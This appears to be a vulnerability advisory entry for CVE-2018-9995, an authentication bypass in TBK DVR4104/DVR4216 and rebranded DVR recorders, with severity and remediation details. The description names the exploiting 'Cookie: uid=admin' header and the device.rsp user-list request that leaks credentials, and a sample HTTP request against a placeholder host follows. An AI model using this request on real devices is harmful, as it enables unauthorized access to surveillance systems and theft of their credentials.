| Title | TBK DVR4104/DVR4216 Devices - Authentication Bypass |
|---|---|
| Author | princechaddha |
| Severity | Critical |
| Impact | An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to unauthorized configuration changes or data exfiltration. |
| Remediation | Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability and ensure strong and unique passwords are used for device access. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94122 |
| CVE ID | CVE-2018-9995 |
| Tags | cve cve2018 auth-bypass tbk edb tbkvision vkev vuln |
TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a “Cookie: uid=admin” header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
GET /device.rsp?opt=user&cmd=list HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-9995.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-9995.pcap
N/AN/A